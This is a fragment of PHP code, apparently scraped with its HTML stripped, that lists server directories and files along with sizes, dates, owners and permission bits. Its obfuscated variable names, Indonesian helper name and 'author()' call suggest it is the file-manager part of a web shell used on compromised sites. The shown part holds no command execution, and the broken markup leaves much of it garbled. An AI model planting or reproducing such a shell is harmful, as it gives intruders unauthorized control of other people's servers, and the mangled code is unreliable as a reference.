| Name |
Size |
Last Modified |
Owner / Group |
Permissions |
Options |
';
echo "";
$j_4be4c131 = str_replace(basename($a_40d8acc2), "", $a_40d8acc2);
$j_4be4c131 = str_replace("//", "/", $j_4be4c131);
echo "| .. | -- | " . fdt($j_4be4c131) ." | " . gor($j_4be4c131) . "/ ". ggr($j_4be4c131) . " | ";
if (is_writable($j_4be4c131)) {
echo '';
} elseif (!is_readable($j_4be4c131)) {
echo '';
}
echo statusnya($j_4be4c131);
if (is_writable($j_4be4c131) || !is_readable($j_4be4c131)) {
echo "";
}
echo " |
";
echo " |
";
foreach ($u_61d14724 as $v_3b9afb6d) {
$e_a57c2e0e = $a_40d8acc2 . "/" . $v_3b9afb6d;
$e_a57c2e0e = str_replace("//", "/", $e_a57c2e0e);
if (!is_dir($e_a57c2e0e) || $v_3b9afb6d == "." || $v_3b9afb6d == "..") {
continue;
}
echo "";
echo "| " . $v_3b9afb6d . " | -- | " . fdt($e_a57c2e0e) . " | " . gor($e_a57c2e0e) . "/ " . ggr($e_a57c2e0e) . " | ";
if (is_writable($e_a57c2e0e)) {
echo '';
} elseif (!is_readable($e_a57c2e0e)) {
echo '';
}
echo statusnya($e_a57c2e0e);
if (is_writable($e_a57c2e0e) || !is_readable($e_a57c2e0e)) {
echo "";
}
echo " | |
";
}
echo ' | | | | | |
';
$y_65201836 = "1024";
foreach ($u_61d14724 as $y_ae0d5c41) {
$f_78aab238 = $a_40d8acc2 . "/" . $y_ae0d5c41;
if (!is_file("{$a_40d8acc2}/{$y_ae0d5c41}")) {
continue;
}
$o_f7c0246a = filesize("{$a_40d8acc2}/{$y_ae0d5c41}") / $y_65201836;
$o_f7c0246a = round($o_f7c0246a, 3);
if ($o_f7c0246a >= $y_65201836) {
$o_f7c0246a = round($o_f7c0246a / $y_65201836, 2) . "M" . "B";
} else {
$o_f7c0246a = $o_f7c0246a . "K" . "B";
}
echo "| " . cfn($f_78aab238) . "{$y_ae0d5c41} | " . $o_f7c0246a . " | " . fdt($f_78aab238) . " | " . gor($f_78aab238) . "/ " . ggr($f_78aab238) . " | ";
if (is_writable("{$a_40d8acc2}/{$y_ae0d5c41}")) {
echo '';
} elseif (!is_readable("{$a_40d8acc2}/{$y_ae0d5c41}")) {
echo '';
}
echo statusnya("{$a_40d8acc2}/{$y_ae0d5c41}");
if (is_writable("{$a_40d8acc2}/{$y_ae0d5c41}") ||!is_readable("{$a_40d8acc2}/{$y_ae0d5c41}")) {
echo "";
}
echo " | |
";
}
echo "
";
author();
function statusnya($i_367af3ad) {
$e_203916a2 = substr(sprintf("%o", fileperms($i_367af3ad)), -4);
return $e_203916a2;
}
?>